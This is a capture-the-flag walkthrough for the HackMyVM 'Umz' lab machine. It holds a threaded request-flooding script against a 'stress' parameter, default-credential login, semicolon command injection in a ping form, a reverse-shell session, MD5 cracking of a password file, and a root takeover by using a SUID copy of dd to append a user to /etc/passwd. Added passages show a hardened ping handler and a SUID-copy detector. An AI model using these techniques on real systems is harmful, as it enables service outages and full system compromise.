HackMyVM-Umz-Walkthrough
城南花已开 Lv6

Information Gathering

Service Detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.159 08:00:27:5f:14:12 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f9:a1:ad VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.061 seconds (124.21 hosts/sec). 4 responded
export ip=192.168.60.159
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.159:22
Open 192.168.60.159:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 22:39 CST
Initiating ARP Ping Scan at 22:39
Scanning 192.168.60.159 [1 port]
Completed ARP Ping Scan at 22:39, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:39
Completed Parallel DNS resolution of 1 host. at 22:39, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:39
Scanning 192.168.60.159 [2 ports]
Discovered open port 80/tcp on 192.168.60.159

Directory Enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.159
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 2714]
Progress: 441118 / 441120 (100.00%)
===============================================================
Finished
===============================================================

There is a single page.

Fetching index.html with curl reveals an HTML comment.

❯ curl $ip
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>cyber fortress 9000</title>
……………………
</head>
<body>
<!-- do you feel lucky, punk? -->
<!-- 你感觉幸运吗,混蛋?-->
……………………

The page also hints that we need to DDoS it.

Normally, DDoSing a target machine only knocks it over and yields no further clues.

DDoS Stress Test

index.php contains a small tip saying that too many requests will trigger some kind of protocol.

Below that there is some sort of prime-number generator.


Fuzz the parameters.

A stress parameter exists.

❯ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u "http://$ip/index.php?FUZZ" --hh 2707
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.159/index.php?FUZZ
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000018871: 200 93 L 201 W 2700 Ch "stress"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 117.6076
Processed Requests: 24608
Filtered Requests: 24607
Requests/sec.: 209.2381

When stress changes, the prime computation changes too, so we keep sending computation requests to the server.

Trying a DDoS may bring unexpected results.

Here is DingTom's script, which keeps sending requests.

import concurrent.futures
import requests

def make_request():
    url = 'http://192.168.60.159/index.php?stress=9999999999999999999999999999'
    try:
        response = requests.get(url, timeout=5)
        return response.status_code
    except Exception as e:
        return str(e)

def main():
    # number of requests and worker threads
    num_threads = 1000000
    max_workers = 20000  # adjust to the resources of your system
    print(f"开始执行{num_threads}个请求...")
    with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
        # submit the tasks
        futures = [executor.submit(make_request) for _ in range(num_threads)]
        # collect the results as they complete
        completed = 0
        for future in concurrent.futures.as_completed(futures):
            completed += 1
            if completed % 1000 == 0:
                print(f"已完成 {completed} 个请求")

if __name__ == "__main__":
    main()

Try visiting the page again: it finally hangs.

Then we rescan the ports and find that an additional port, 8080, is now open.

❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.159:22
Open 192.168.60.159:8080
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 23:32 CST
Initiating ARP Ping Scan at 23:32
Scanning 192.168.60.159 [1 port]
Completed ARP Ping Scan at 23:32, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:32
Completed Parallel DNS resolution of 1 host. at 23:32, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:32
Scanning 192.168.60.159 [2 ports]
Discovered open port 8080/tcp on 192.168.60.159
Discovered open port 22/tcp on 192.168.60.159
Completed SYN Stealth Scan at 23:32, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.159
Host is up, received arp-response (0.00059s latency).
Scanned at 2025-06-12 23:32:12 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
8080/tcp open http-proxy syn-ack ttl 64
MAC Address: 08:00:27:5F:14:12 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Let's probe it.

❯ whatweb http://$ip:8080
http://192.168.60.159:8080 [302 Found] Country[RESERVED][ZZ], HTTPServer[Werkzeug/1.0.1 Python/3.9.2], IP[192.168.60.159], Python[3.9.2], RedirectLocation[http://192.168.60.159:8080/login], Title[Redirecting...], Werkzeug[1.0.1]
http://192.168.60.159:8080/login [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/1.0.1 Python/3.9.2], IP[192.168.60.159], PasswordField[pass], Python[3.9.2], Title[Debug Console Login], Werkzeug[1.0.1]

There is a login form; try the weak credentials admin:admin.

It lets us run the ping command.

A semicolon is enough to bypass the restriction.
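The writeup does not show the debug console's code, so the following is an added reconstruction (my own, not the box's Flask app) of how a ping feature turns into command injection when the host field is pasted into a shell line, beside a hardened handler that validates the field as an IP address and passes an argv list with no shell. Function names are assumed.

```python
import ipaddress
import shlex
import subprocess

def vulnerable_ping_command(host: str) -> str:
    # The pattern behind the semicolon bypass above: the host field is pasted
    # into a shell line and run with shell=True, so ';' terminates ping and
    # the shell executes whatever follows as a second command.
    return f"ping -c 1 {host}"

def safe_ping_argv(host: str) -> list[str]:
    """Validate the field as a literal IP address and build an argv list.

    ipaddress rejects anything that is not an address (spaces, ';', '|',
    '$(...)', hostnames), and an argv list goes to execve without a shell,
    so nothing in it can be reparsed as a second command.
    """
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError(f"rejected ping target: {host!r}") from None
    return ["ping", "-c", "1", str(addr)]

def quoted_ping_command(host: str) -> str:
    # Second line of defence when a shell string is unavoidable: shlex.quote
    # turns the whole field into one single-quoted word.
    return f"ping -c 1 {shlex.quote(host)}"

def run_ping(host: str) -> str:
    """What the console handler should call; returns ping's stdout."""
    proc = subprocess.run(safe_ping_argv(host), capture_output=True,
                          text=True, timeout=10)  # shell=False by default
    return proc.stdout

if __name__ == "__main__":
    print(vulnerable_ping_command("127.0.0.1; id"))  # two commands for the shell
    print(quoted_ping_command("127.0.0.1; id"))      # one quoted argument
    print(run_ping("127.0.0.1"))
```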


User Privilege Escalation

Get a reverse shell back.

Listen on a port.

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.60.100
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Umz-192.168.60.159-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Umz~192.168.60.159_Linux_x86_64/2025_06_12-23_36_09-254.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
welcome@Umz:/root$ cd ~
welcome@Umz:~$ cat user.txt
flag{user-4483f72525b3c316704cf126bec02d5c}
welcome@Umz:~$ cat /etc/passwd |grep bin/bash
root:x:0:0:root:/root:/bin/bash
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
umzyyds:x:1001:1001:,,,:/home/umzyyds:/bin/bash

There is also another user, umzyyds.

The /opt/flask-debug directory contains umz.pass,

which the current user cannot read.

welcome@Umz:~$ cd /opt/
welcome@Umz:/opt$ cd flask-debug/
welcome@Umz:/opt/flask-debug$ ls -al
total 20
drwxr-xr-x 2 welcome welcome 4096 May 3 10:32 .
drwxr-xr-x 3 root root 4096 May 3 09:46 ..
-rw-r--r-- 1 root root 5001 May 3 10:23 flask_debug.py
-rwx------ 1 root root 10 May 3 10:32 umz.pass

The current user has sudo rights

and can run md5sum.

welcome@Umz:/opt/flask-debug$ sudo -l
Matching Defaults entries for welcome on Umz:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on Umz:
(ALL) NOPASSWD: /usr/bin/md5sum

Judging from the byte count of umz.pass, the plaintext is 9 characters.

The trailing \n newline counts as the last byte: without echo -n, 9 characters become 10 bytes.

echo "123456789">abc
ls -al abc
-rw-r--r-- 1 Pepster Pepster 10 Jun 12 23:40 abc

Try brute-forcing the MD5 value.

welcome@Umz:/opt/flask-debug$ sudo md5sum umz.pass
a963fadd7fd379f9bc294ad0ba44f659 umz.pass

Use the following script; note that echo must not be given the -n flag.

#!/bin/bash

TARGET_MD5="a963fadd7fd379f9bc294ad0ba44f659"  # target MD5 hash
WORDLIST="/usr/share/wordlists/rockyou.txt"    # wordlist path

echo "开始爆破 MD5: ${TARGET_MD5}"
echo "使用词典: ${WORDLIST}"

# check that the wordlist exists
if [ ! -f "$WORDLIST" ]; then
    echo "错误: 词典文件 '${WORDLIST}' 不存在。"
    exit 1
fi

while IFS= read -r i; do
    # compute the MD5 of "$i" followed by a newline: echo without -n appends
    # the \n, which reproduces the 10-byte umz.pass written by a plain echo
    # (echo -n would drop it and yield a different hash)
    # md5sum hashes its standard input; we keep only the first field
    WORD_MD5=$(echo "$i" | md5sum | awk '{print $1}')

    if [[ "$WORD_MD5" == "$TARGET_MD5" ]]; then
        echo "找到匹配! 原始字符串: '$i'"
        exit 0  # stop once a match is found
    fi
done < "$WORDLIST"

echo "未在词典中找到匹配的字符串。"

We get the password sunshine3.

Root Privilege Escalation

Switch user.

❯ bash a.sh
开始爆破 MD5: a963fadd7fd379f9bc294ad0ba44f659
使用词典: /usr/share/wordlists/rockyou.txt
找到匹配! 原始字符串: 'sunshine3'
---------------------------
welcome@Umz:/opt/flask-debug$ su umzyyds
Password:
umzyyds@Umz:/opt/flask-debug$ cd ~
umzyyds@Umz:~$

The user's home directory contains a SUID file.

umzyyds@Umz:~$ ls -al
total 96
drwx------ 2 umzyyds umzyyds 4096 May 3 10:42 .
drwxr-xr-x 4 root root 4096 May 3 10:27 ..
lrwxrwxrwx 1 root root 9 May 3 10:38 .bash_history -> /dev/null
-rw-r--r-- 1 umzyyds umzyyds 220 May 3 10:27 .bash_logout
-rw-r--r-- 1 umzyyds umzyyds 3526 May 3 10:27 .bashrc
-rwsr-sr-x 1 root root 76712 May 3 10:42 Dashazi
-rw-r--r-- 1 umzyyds umzyyds 807 May 3 10:27 .profile

Looking at its help output, it looks very similar to the dd command.

Verify it: sure enough, it is the dd command, just renamed.

umzyyds@Umz:~$ md5sum Dashazi
1f90de0a1b75febeda1936a1ed9e1066 Dashazi
umzyyds@Umz:~$ md5sum /bin/dd
1f90de0a1b75febeda1936a1ed9e1066 /bin/dd
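The md5sum comparison above generalises into a detection check: find every SUID file under a directory and report those whose bytes are identical to a utility in a trusted tool directory, which is exactly how a renamed copy of dd such as Dashazi shows up. This is an added example of mine, not code from the writeup; demo() builds a constructed fixture in a temp dir rather than touching the real box.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path

def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def find_suid_files(root: Path) -> list[Path]:
    """Every regular file under root with the setuid bit set (find -perm -4000)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            try:
                st = p.lstat()  # lstat: a symlink to a SUID file is not itself SUID
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(p)
    return found

def suid_copies_of_tools(scan_root: Path, tool_dir: Path) -> dict[Path, str]:
    """SUID files outside tool_dir whose bytes match a tool in tool_dir (Dashazi -> 'dd')."""
    refs = {sha256_of(t): t.name for t in tool_dir.iterdir() if t.is_file()}
    tool_dir = tool_dir.resolve()
    hits = {}
    for p in find_suid_files(scan_root):
        if p.resolve().parent == tool_dir:
            continue  # the tool in its normal place (a legitimately SUID passwd, say)
        digest = sha256_of(p)
        if digest in refs:
            hits[p] = refs[digest]
    return hits

def demo() -> dict[str, str]:
    """Constructed fixture: fake tool dir with 'dd'; home with a SUID copy and a plain copy."""
    tmp = Path(tempfile.mkdtemp())
    tools, home = tmp / "bin", tmp / "home"
    tools.mkdir()
    home.mkdir()
    body = b"\x7fELF stand-in for the dd binary"  # constructed, not a real ELF
    (tools / "dd").write_bytes(body)
    (home / "Dashazi").write_bytes(body)
    (home / "Dashazi").chmod(0o4755)  # -rwsr-xr-x, as in the ls -al above
    (home / "plain").write_bytes(body)  # identical bytes but no setuid bit
    return {p.name: tool for p, tool in suid_copies_of_tools(home, tools).items()}

if __name__ == "__main__":
    print(demo())
```

For a real audit call suid_copies_of_tools(Path("/home"), Path("/usr/bin")); matches against /usr/bin alone will not cover tools that live elsewhere, so extend the reference directory list as needed.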

Use dd to write the /etc/passwd file.

umzyyds@Umz:~$ cp /etc/passwd .
umzyyds@Umz:~$ echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>passwd
umzyyds@Umz:~$ ./Dashazi if=passwd of=/etc/passwd
2+1 records in
2+1 records out
1485 bytes (1.5 kB, 1.5 KiB) copied, 0.00386415 s, 384 kB/s
umzyyds@Umz:~$ tail -n 1 /etc/passwd
primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash
umzyyds@Umz:~$ su primary
Password:
root@Umz:/home/umzyyds# id
uid=0(root) gid=0(root) groups=0(root)
root@Umz:/home/umzyyds# cat /root/root.txt
flag{root-a73c45107081c08dd4560206b8ef8205}

Afterword

  • Monitoring script
root@Umz:~# cat monitor.sh
#!/bin/bash
# file name: monitor.sh
TARGET_URL="http://localhost/index.php"
CHECK_INTERVAL=3  # check every 3 seconds
MAX_FAILS=3       # 3 consecutive failures trigger the action
FAIL_COUNT=0

while true; do
    # check whether the page contains the marker string (3 second timeout)
    RESPONSE=$(timeout 3 curl -s -w "%{http_code}" "$TARGET_URL")
    STATUS=$?
    HTTP_CODE=$(echo "$RESPONSE" | tail -n1)
    CONTENT=$(echo "$RESPONSE" | head -n-1)

    # failure condition: HTTP status not 200, or the marker string is missing
    if [[ $STATUS -ne 0 || $HTTP_CODE != 200 || ! "$CONTENT" =~ "HEALTHY_STRING" ]]; then
        FAIL_COUNT=$((FAIL_COUNT + 1))
        echo "[$(date)] 检测到服务异常,失败次数:$FAIL_COUNT" >> /var/log/monitor.log

        if [ $FAIL_COUNT -ge $MAX_FAILS ]; then
            echo "[$(date)] 触发故障转移!关闭Apache,启动Flask服务..." >> /var/log/monitor.log
            systemctl stop apache2
            sudo -u welcome python3 /opt/flask-debug/flask_debug.py
            exit 0
        fi
    else
        FAIL_COUNT=0
    fi

    sleep $CHECK_INTERVAL
done